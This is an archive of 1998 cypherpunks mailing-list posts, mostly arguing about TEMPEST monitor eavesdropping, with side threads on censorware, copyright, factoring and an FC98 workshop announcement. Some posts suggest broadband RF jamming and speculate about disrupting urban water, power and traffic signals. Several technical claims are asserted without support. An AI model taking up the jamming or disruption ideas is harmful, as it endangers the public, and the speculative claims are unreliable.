Tempest display will be gibberish.

> In addition, the
> Tempest monitor cannot distinguish between an all-black and an all-white
> image, which it should in the case of a screen-grid caused modulation.

What? This is malarky. If the screen is black the filament emissions are
being blocked by the screen grid and the charge cloud gets shunted to ground
via the aquadag coating. This means there is no current, and as a
consequence no emitted rf field to monitor. And what keeps it from blowing
the flyback in this case is that the charge cloud acts as a capacitor
and limits the dv/dt to something that the flyback can deal with, it has to
leak past the screen grid.

You can also discern this using Tempest to monitor NTSC where the black
pulse is a negative going pulse at the end of the scanline waveform. It's
there so the receiver electronics can know when to turn the e-beam off so
you don't get those annoying retrace lines across your screen when it moved
back to the left and down one line. Since it's a negative going pulse with
respect to the vertical and horizontal retrace it's dv/dt is going in the
opposite direction. If you get a schematic find the horizontal retrace clock
and disable it and monitor the display.

> If there is indeed a screen-grid modulation, then it is *much* weaker
> than any modulation that you get by software dithering.

This is just plain silly. The switching of the software is drowned in a sea
of such noise on the board. Anyone who claims they can pull a valid signal
off a cpu pcb at more than a few feet is a liar or else they have some
pretty remarkable extra-terrestrial technology. There are litteraly 10's of
thousands of state transitions all over the pcb that are going on in
parallel and the positive transition fields cancel the negative transition
fields so what you end up with is a hash of noise. 30 seconds of looking at
a spectrum analyzer will make this obvious.

In modern computers what drives the crt is the data residing in the video
frame buffer that drives the output electronics on the card and not the
data on the cpu pcb.

> Monitors are pretty strange antennas: For instance, my monitor still
> radiates quite well (although noticeably weaker) if I switch its power
> supply off.

It can take as much as 20 minutes to drain a good high-voltage supply (read
the documents of all power supplies that operate above a couple hundred
volts, it should include the discharge time constant - you want to wait
through at least 3 of those). There is also the issue that a crt tube sitting
unconnected in the open dry air will develop enough of a charge to knock the
shit out of you if you're silly enough to grab the grounding connection on
the side with one hand and be grounded to earth with the other. So even if
the machine is turned off you get a continous charge build up on the tube
that gets drained through various resistors to ground. Unfortunately this
is a pretty incoherent signal and low power as well.

I routinely deal with voltages in the 1MV range and currents (usualy not at
those voltages) in the 100A range (I build 12 ft. Tesla Coils for grins and
giggles that throw discharges in the 8-12 ft. range). When you start talking
about voltages above a few hundred there isn't any such thing as 'off', only
a higher impedance path to ground and longer time constants.

NOTE: if you do decide to play in your monitor then make shure that one of
      your hands is in your back pocket at *ALL* times. Otherwise make shure
      there is somebody there to call 911 so they can haul your body off. If
      you don't the discharge leakage current through your heart *when* you
      make a mistake will cause it to go into ventricular fibrillation
      (v-fib). Unless you got a de-fibrillator handy your dead in about 3
      minutes.

> Just the passive resonance of the chassis gives a clear
> signal in around a meter radius with a simple untuned dipole antenna.

If they get within a meter of my machine I seriously doubt they will be
using VanEck but rather rubber hose or eye ball monitoring...

We're talking real world here not some Tom Clancy novel.

> Switching off a monitor alone does not protect you from eavesdropping
> a VDU signal, especially if the signal is not just text but a pattern
> optimized for reception.

True, but instead of being within a couple hundred feet (the average
succesful range for interception) you're now talking about 10's of feet.
At that range my dogs barking will let me know that Mallet is in the house.

> After I unplug the VGA cable however, I can't pick up any signal with
> our Tempest receiver unless I bring the antenna almost in contact with
> the cable or connector.

Duh, can you say 'impedance'....go back and study your analog and rf
electronics. A monitors off impedance per line is somewhere in the 50 to 75
ohms range. The impedance of a wire hanging in the air is much higher and as
a consequence the current flow and as a result the emitted em field will be
much lower.

> The closed PC chassis also appears to be no very
> big source of VDU emanations, certainly much below the levels that
> our receiver can detect.

And this surprises you? A pc chassis, provided you put all the screws in it
and don't have lots of holes in it, is a Faraday Cage, it's the reason they
make them out of expensive metal and not cheaper plastic.

A very effective method to confuse Van Eck is to have several monitors
sitting next to each other with different displays. A more active display
is much more effective than one that is static (eg. such as a person typing
in an email to cypherpunks).

I strongly suggest the following reference:

High-speed Digital Design: a handbook of black magic
H.W. Johnson, M. Graham
ISBN 0-13-395724-1
~$60 US


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 01:46:07 +0800
To: cypherpunks@toad.com
Subject: Re: Soft Tempest
In-Reply-To: <199802090715.CAA24788@the-great-machine.mit.edu>
Message-ID: <E0y1x0U-0000eF-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey wrote on 1998-02-09 07:15 UTC:
> The paper pretty clearly says laptop LCDs are not sufficiently quiet.  Until
> I read this, I was under the impression they were; perhaps passive matrix
> screens are and active are not.

I even used a laptop for a Tempest demo in Ross' undergraduate security
course here at Cambridge, because it gave such a clear signal and was
much easier to transport than a CRT.

> (actually, I can totally understand that
> wrt the pulse modulation not present in modern crts)

I added this sentence in the paper only for those who had read the
van Eck paper before, which in this respect is a little bit out-of-date
and does not describe today's VDU technology.

> I had a real bitch of a time finding open source TEMPEST information, which
> is part of why the idea was back-burnered.  I think there is a concerted
> effort on the part of the government to prevent open source discussion of
> the topic, through manipulation of research money, etc.

Same experience here ... :-(

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 10 Feb 1998 10:02:42 +0800
To: cypherpunks@toad.com
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <3.0.5.32.19980209124816.0079ba20@otc.net>
Message-ID: <3.0.5.32.19980209174919.007b18a0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 06:34 PM 2/9/98 EST, Dr.Dimitri Vulis KOTM wrote:
>One can "disrupt" the water supply by just making a credible assertion that
>it's been poisoned - but it won't kill nearly as many people as actual
>poison (or virus/bacteria).
>

Psychops?
That doesn't work when you have sufficient health-orgs and telecomm
to get the word out that the water's ok.

Actually, a lot of people drink bottled water here :-) but 
the 10 million kilos of shit excreted by LA every day would
build up pretty fast.

Electric power is probably as vunerable as waterways, despite 
conscious efforts to make the grid redundant.  Of course
both are controlled by computers, as uncle sam is realizing.
In LA, all it takes to create a looting riot is to cut electricity
to the city's alarm systems... 

....

Major freeway intersections are closed down 2-3 times a year in LA
due to bomb threats, which are usually just threats -no bombs are found.
You can snarl the roads very easily at the right time of day, since
the roads' bandwidth is already exceeded and congestion persists after the
clog is removed.

At *least* once a month a major piece of freeway is shut down for
an hour or so for "police activity", one hears on traffic reports, often
around rush
hour.

Crypto relevance: traffic signals can be controlled by modem, a Civ-E
friend tells me.  They are built to be fail-safe (blinking red), but
ever seen  rush hour commuters deal with all blinking red?  Even tanks
can't get through a gridlocked city (a factor in Korean invasion planning).




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Tue, 10 Feb 1998 12:23:46 +0800
To: cypherpunks <cypherpunks@sirius.infonex.com>
Subject: RE: Cyber 'Nannys"
Message-ID: <34DF87FE.611AA4EF@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



An anonymous person wrote, in reference to CyberSitter type 'blocking'
software:

"These companies are attempting to provide the services desired by
their customers... They give concerned parents a sense of safety..."

While I do not disagree that these companies should be able to market
their products, I wholeheartedly disagree with the fact that often their
customers (the adults who bought the software or subscribed to he
'service') are not allowed to have a list of what is actually blocked,
and decide for themselves if they want their kids to have access to any
of these sites.  It would be beating a dead horse to describe, here,
the potential value of some of the information that is blocked by these
packages; one only has to take a look at any of the published news
reports (or actually use one's sense of reason) to see that there are
many web sites that contain some of the words that are automatically
bloked by these 'services' that are absolutely not...smut <for lack of a
better term>, hate speech, or illegal/illicitly oriented.

On another, perhaps more severe (to you, Anonymous poster,) angle, they
DO NOT, NOR CAN THEY provide a genuine saftey zone for the children who
are to be 'protected.'  They are providing a false sense of security to
parents who, for one reason or another, feel that they are not able to
provide their children with direction on what to, and what not to, view
on the internet as well as what to do if the instance arises that
something that is deemed taboo happens to pop up on their monitor when
they click on the 'Chutes and Ladders' web site <for example, I don't
know if there is one...trying to be safe and guess that there is not>.

I am assuming that there is no latent support for the use of these
packages in public libraries, so I won't go into that issue.  In
general, these programs are flat out crap.  They purport to do something
that is impossible to accomplish and they often refuse to even inform
their customers what they actually ARE doing.

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 07:59:43 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: SOFT TEMPEST (fwd)
Message-ID: <199802092357.RAA25254@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: SOFT TEMPEST 
> Date: Mon, 09 Feb 1998 16:44:52 +0000
> From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

> The software that displays the license number plus activation instance
> random code in your windows toolbar as an easy receivable spread
> spectrum barcode would have to take care of this depending on how
> exactly your license agreement is formulated. This can be resolved
> in many ways.

Has your technique been verified by any 3rd parties who are not affiliated
with you or your firm? Do you expect to do any public demonstrations of this
technology in the near future? Would it be possible to arrange for a
indipendant 3rd party to receive a test setup for evaluation?

> The technique of hunting software license violators via Tempest
> monitoring is not really targeted at providing 100% accurate
> and reliable identification of abuse at any point of time as

That's good. The thought that given current technology a signal reception
van could pull one monitors display out of a building that could potentialy
have 1,000+ pc's (my last job had about 1500/floor and 3 floors) at a range
of say 200 ft. is truly incomprehensible. If it works that is a feat worth
many laurels.

> (e.g., has bought a single copy of an expensive CAD software but
> uses it on over 80 workstations all day long), which then can
> justify to get court relevant proof by traditional means of
> police investigation.

You show up in my companies parking lot without my permission and start
snooping you'll be the one sitting in jail facing industrial espionage
charges. Any defence lawyer worth a damn would be able to blow this out of
the water, private citizens don't have the right to invade my privacy any
more than police without a warrant - and that take probable cause.

> One obvious countermeasure are Tempest shielded computers or rooms,

It's the monitors that need shielded, the computers already sit in a Faraday
cage. Simple copper screen glued to the inside of the monitor case with a
paper sheild and then grounded will resolve that problem. Be shure to put a
grounded screen on the front of the tube as well (similar to those radiation
shields that some companies make that don't work because they aren't
grounded).

> Another countermeasure are software reverse-engineering and modifying
> the broadcast code. This is around as difficult as removing dongle
> checking code: Not impossible, but for the majority of users too
> inconvenient.

A simple Gunn Diode oscillator driving a broad-band 100W rf amplifier will
swamp any signal you could hope to catch. Cost, about $250 ea. With the
new low-power transmitter rulings there wouldn't be much anyone could do
about it either.

> an interesting application. Tempest research requires some
> expensive equipment (special antennas, very high-speed DSP
> experimental systems, an absorber room, etc.).

Gee, and to think that when I've done this sort of stuff I only used a
Commodore 1702 composite monitor and some rf amplifiers and filters...
Duh, silly me. Any claim that it can *only* be done with lots of money is
almost always wrong.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Feb 1998 03:01:00 +0800
To: igor@Algebra.COM
Subject: what is video-collage.com?
In-Reply-To: <199802082302.RAA18137@manifold.algebra.com>
Message-ID: <199802091802.SAA00773@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




I have long noticed lots of video-collage in the distributed cpunks
list headers.

Now we see:

> From: "Igor Chudov @ home" <ichudov@www.video-collage.com>
> To: cypherpunks@www.video-collage.com, freedom-knights@jetcafe.org,

ie sent to cypherpunks@www.video-collage.com by ichudov@ the same.

What does this mean Igor?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Feb 1998 08:40:02 +0800
To: cypherpunks@toad.com
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <3.0.5.32.19980209124816.0079ba20@otc.net>
Message-ID: <mBRNke5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Honig <honig@otc.net> writes:

> 
> 
> LA has a combination of closed pipes and open aqueducts, often
> in remote areas.  Simple disruption, not poisoning, would
> be easier.  The resivoirs don't hold enough for more
> than a few days.

One can "disrupt" the water supply by just making a credible assertion that
it's been poisoned - but it won't kill nearly as many people as actual
poison (or virus/bacteria).


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Feb 1998 02:58:22 +0800
To: cypherpunks@cyberpass.net
Subject: Argentina rules: no software copyright
Message-ID: <199802091834.SAA00865@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




(from cpsr list, from edupage)

: ARGENTINE SUPREME COURT RULES SOFTWARE PIRACY LEGAL 
:
: Executives of Microsoft, IBM and Unisys are protesting a recent
: Argentine Supreme Court decision ruling that antiquated copyright
: laws don't cover computer software.  Software makers point out that
: royalties aren't paid on about 70% of the software sold in
: Argentina, resulting in roughly $165 million in revenue losses
: annually.  A recent study by Price Waterhouse & Co. indicates the
: biggest abusers are Argentine federal and local government agencies
: and small private businesses.  "There's no culture in Argentina of
: assigning value to software," says a Unisys unit president.  (Wall
: Street Journal 6 Feb 98)

I like best Mark Grant's comment on why copyright should be scrapped:
it is a form of government subsidy.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Feb 1998 03:13:40 +0800
To: cypherpunks@cyberpass.net
Subject: time to learn chinese?
Message-ID: <199802091845.SAA00883@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Listened to an analyst on the radio expressing view that towards 2010
China will be leading world economic power.

Anyway interesting was that the analyst expressed that in her view
China was keen to avoid the mistakes of the socialist welfare state as
market liberalization and prosperity grew.  She considered the burden
of a welfare state to be a large burden which would mean that
China would outstrip growth in the west.

Also she stated that she thought democracy was in decline.  When
interviewed asked about human rights, she opined that these would
improve as the market became freer.  She stated that China hopes to
bypass democracy going straight to free market.

China may be interesting in a few more decades...

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 08:47:42 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Laptop TEMPEST (fwd)
Message-ID: <199802100045.SAA25569@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 09 Feb 1998 16:36:16 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Laptop TEMPEST (fwd)

> At 08:30 AM 2/9/98 -0600, Jim Choate wrote:
> >> FCC RF/EMC testing is well nigh useless for TEMPEST protection.
> >
> >I disagree, it would give you a gross baseline on the total emissions

> FCC specs aren't real tight.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 08:51:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802100054.SAA25744@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 09 Feb 1998 14:22:40 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: the best justice money can buy --Lessig (fwd)

> Gates got rich not by selling good software, but by selling software
> very well.

His original money was made by being the first company to sell a CP/M
compliant BASIC. It was very heavily pirated and Microsoft became a de facto
standard for S-100 using CP/M. Then because of Digital Research's failure to
treat IBM with respect he was selected as the supplier for their basic OS.
This decision was made because of his reputation with CP/M software. Because
of this connection Microsoft was in a position such that Gates couldn't help
but make money as long as IBM was selling pc's. And considering nobody ever
lost their job buying IBM it was a shoe in that IBM was going to sell
machines. His first versions of Windows didn't sell. He looked at what was
selling which was a GUI with more features and better looks. He hired the
right people to impliment those changes and wallah he had a winner. All
those pc's running his old os no longer had to go to Desqview and DR to get
a GUI that was acceptable to their users. From their they have used various
marketing and licensing tricks to increase his market share.

> Copyright is part of the process, but it's possible to
> sell your product to computer manufacturers with any customization
> they need using contracts instead of copyright to make your money.

But a company doesn't make money from selling software to computer
manufacturers, they make money by having their software on pc's that the
users use.

> It's also possible to do copy protection in your software;
> games makers do this because they're widely pirated by non-point-source
> attacks (kids, mostly) who are hard to track down and sue,
> unlike major computer manufacturers who are easier to find,
> both to sue if needed or to provide support for.
> Copy protection was one of the things people hated about Lotus 123;
> I don't remember Excel or MS-DOS ever having it.

And in the long run non-copyrighted software has a significant market
advantage. It's smaller, it is more stable, and people don't get as pissed
off when they want to make their backups.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 10 Feb 1998 02:14:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rec.guns et.al. blocked by censorware
Message-ID: <199802091755.SAA07601@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>That the "cyber nannies" are blocking it (and other similarly nonsexual,
>nonprofane newsgroups) is exactly what was expected. These cyber nannies
>become tools for political correctness.
>
>Perhaps the strategy should be to post material to other newsgroups to get
>them blocked as well. (Though I expect the blocking is not being done using
>robots to monitor for illegal words, as rec.guns would not have been
>blocked this way. Rather, the cyber nannies are probably using their "PC
>judgment" to block groups they don't like.

These companies are attempting to provide the services desired by
their customers.  These are generally cautious, conservative parents
who want to allow their young children access to the internet without
them stumbling over dangerous or disturbing information.  Like it or not,
many parents are very protective of their children.  We have no right
to force our own views of childrearing on them.

The filtering companies are filling a legitimate need in the marketplace.
They are not evil and they are not trying to prevent adults from viewing
the material they desire via their own personal accounts.  They give
concerned parents a sense of safety in allowing their children to use
the internet, and in that way allow young people access to the net who
would not otherwise be allowed to use it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 09:04:00 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What's the latest in factoring? (fwd)
Message-ID: <199802100105.TAA25850@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 09 Feb 1998 13:40:03 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: What's the latest in factoring?

> Remember that factoring difficulty is roughly exponential;
> adding logn bits about doubles the cracking workload 
> (depending on which factoring method is being used).  
> Factoring a 1024-bit number is _much_ harder than factoring a 512-bit
> number, and factoring a 2048-bit number is well into age-of-the-universe 
> difficulty level.  The practical level of factoring right now
> is about 512 bits, for either a distributed internet effort or
> an NSA internal one; in the unlikely event that Moore's law lets
> us double processing power 100 times in the next 150 years,
> that means a 1500-bit key could be crackable.  So 2048 bits
> is certainly more than enough for _your_ lifetime.

That depends on what current and near-future medical technology can do
to extend the lifespan of humans. If your assumption is that most folks
younger than about 50 will be dead in 75 years I suspect that you're in for
a nasty surprise. The reason I posted those cc:'s regarding such research is
enough that current estimates of key strength based on human life times need
to be re-evaluated. It is my suspicion that within 10-15 years it will be
possible, as a matter of course in regards employer medical insurance, to
have ones biological clock reset such that the lifespan will be extended 3-4
times with the main limiting factor being cancers. Under those conditions
key strength lifetime computations need to be re-evaluated.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 09:18:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Driver Licenses (fwd)
Message-ID: <199802100120.TAA25990@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 02:12:05 +0100 (CET)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: Re: Driver Licenses

> On Mon, 9 Feb 1998, Tim May wrote:
> > If a U.S. Passport is not considered enough I.D., because it doesn't have
> > the Big Brother Inside magstripe, one walks away from the transaction.
> 
> Just as a data point, in the State of Oregon, an US passport is *not*
> valid ID for alcohol purchases. Magstripe or no magstripe.

You can add Texas to that list. You can use a passport to get a Tx DL or ID
card but it in and of itself is worthless for personal ID in most cases.
Most places here specificaly require a valid drivers license from some
state, they don't seem too interested in if Big Brother certifies your
identity.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Tue, 10 Feb 1998 11:48:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What Jim Choate doesn't know
In-Reply-To: <199802100200.DAA04492@basement.replay.com>
Message-ID: <3.0.5.32.19980209193915.00879d60@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

>Anybody else have the same experience?
......................................................................


You must understand:  it's basically understood.  


    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Tue, 10 Feb 1998 04:20:45 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: EPIC World Crypto Survey
In-Reply-To: <1.5.4.32.19980209142939.00b36c60@pop.pipeline.com>
Message-ID: <19980209.195159.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

    statistics dont lie, but liars use statistics.

    back to the same old square one --getting the couch tomatoes
    (they've gone soft) riled enough to understand the lies. fat
    chance, as long as they can be fat, dumb, and happy the sloths
    will still vote their wallets.

>The New York Times, February 9, 1998, p. D10:
>U.S. Losing Battle on Control of Data Encryption, Study Says
  [...]
>That finding directly contradicts the Clinton Administration's assertions
>in Congressional hearings that it has the support of most nations on this
>issue. ...

>William Reinsch, the Under Secretary for export administration in the
>United States Commerce Department, denied that the study contradicted the
>Administration's assertions. "All the Administration has ever said is that 
>there are more countries that go farther  than we do," Mr. Reinsch said. 
>"The study  confirms that."
      ^^^^^^^^^^^^^^^^^^^^

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNN9fr7R8UA6T6u61AQHPtgH/cW5VUP54BrXk9t4KjP4LwuxjZ1jsp+0u
ghMqpRSq6p88LKrdMIkaLxq4NYj5+anH0OLZY5bm86/YUmrEp5BFVA==
=nf7E
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 10 Feb 1998 10:06:02 +0800
To: cypherpunks@toad.com
Subject: Financial Cryptography 1998 Workshop UPDATE
Message-ID: <v04003a05b10563e677d2@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Mon, 9 Feb 1998 14:37:24 -0400
X-Authentication-Warning: online.offshore.com.ai: list set sender to
fc98-request@offshore.com.ai using -f
Subject: Financial Cryptography 1998 Workshop UPDATE
To: fc98@offshore.com.ai
Date: Mon, 09 Feb 1998 10:20:13 -0800
From: Ian Goldberg <iang@cs.berkeley.edu>
Resent-From: fc98@offshore.com.ai
X-Mailing-List: <fc98@offshore.com.ai> archive/latest
X-Loop: fc98@offshore.com.ai
Precedence: list
Resent-Sender: fc98-request@offshore.com.ai

CALL FOR PARTICIPANTS - UPDATE

The Financial Cryptography 1998 (FC98)
Workshop for Senior Managers and IS Professionals

March 2-6, 1998

The InterIsland Hotel
Anguilla, BWI

<http://fc98.ai/>

FC98 is sponsored by:

   * RSA Data Security Inc. <http://www.rsa.com/>
   * C2NET, Inc. <http://www.c2.net/>
   * Hansa Bank & Trust Company Limited, Anguilla <http://www.hansa.net/>
   * Sicherheit und Privat- International Bank
   * Offshore Information Services <http://www.offshore.com.ai/>
   * e$ <http://www.shipwright.com/>

FC98 Conference and Exhibition
February 23-27, 1998

FC98 Workshop for Senior Managers and IS Professionals
March 2-6, 1998

The Inter-Island Hotel
Anguilla, BWI

Workshop and Conference Reservations: <http://fc98.ai/>

Last year, the Financial Cryptography '97 (FC97) Workshop was the world's
first intensive financial cryptography workshop for senior managers and IS
professionals. This year, the Financial Cryptography '98 (FC98) Workshop
will be held Monday through Friday, March 2-6, 1998, at the Inter-Island
Hotel on the Carribbean island of Anguilla.

This workshop will follow the peer-reviewed financial cryptography
conference and commercial exhibition, Financial Cryptography 1998 (FC98),
which will be held the preceding week, February 23-27, 1998.

The goals of the combined workshop, conference and exhibition are:

   * to give senior managers and IS professionals a solid understanding of
     the fundamentals of strong cryptgraphy as applied to financial
     operations on public networks,
   * to provide a peer-reviewed forum for important research in financial
     cryptography and the effects it will have on society, and,
   * to showcase the newest products in financial cryptography.

The Workshop

Ian Goldberg, the Workshop chair, has picked an outstanding team of
instructors in financial cryptography and internet financial system security
to teach the courses in this workshop. The Workshop will consist of 40 hours
of intensive instruction and lab time over 5 days. Students will have access
to Internet-connected workstations.

Who Should Attend

The Workshop is intended for senior IS managers and technical professionals
who want to get completely up to speed on the design, development, and
implementation of financial cryptography systems, the core technology of
internet commerce. After the workshop, senior managers will have a hands-on
understanding the strengths and liabilities of currently available financial
cryptography and internet transaction security software and hardware, and
thus be able to make better asset allocation decisions in this area of
explosive technology growth. Senior technical professionals with strong IS
experience will be able to implement those technologies and to pass on what
they've learned to their clients and colleagues when they return home.

The Workshop will be held in a casual but intensive atmosphere at the very
cutting edge of financial technology on the internet. Someone has likened
the experience to a financial cryptography bootcamp. At the end, Workshop
attendees should be utterly conversant in cryptography as it applies to
finance. Workshop participants will not only know what everyone else is
doing now in internet commerce, but, more important, because they understand
the implications of strong financial cryptography on ubiquitous public
networks, they will be able to know what to do *next*.

The Workshop Leader

Ian Goldberg is a Ph.D. student in security and cryptography at the
University of California, Berkeley. He was the first winner of RSA Data
Security Inc.'s Secret-Key Challenge, breaking a 40-bit cipher in just 3.5
hours. In late 1995, he discovered what became a much-publicized flaw in
Netscape's implementation of SSL. He is a recognized expert in electronic
payment systems, and in DigiCash's ecash digital bearer certificate protocol
in particular. He has produced several ecash clients for Unix and Windows,
as well as an ecash module for the Stronghold web server, which has extended
the existing ecash system for better security, privacy, and ease-of-use.

The Principal Instructors

Gary Howland has spent the last four years with several companies that are
primarily working with secure electronic commerce (including Digicash),
where he has been involved with the design and development of secure payment
protocols, and the application of these protocols to such tasks as
electronic cash, bond trading, loyalty systems, and online gambling. He is
also responsible for the development of the a freely available cryptographic
library for java and perl.

John Kelsey is an experienced cryptographer, cryptanalyst, and programmer
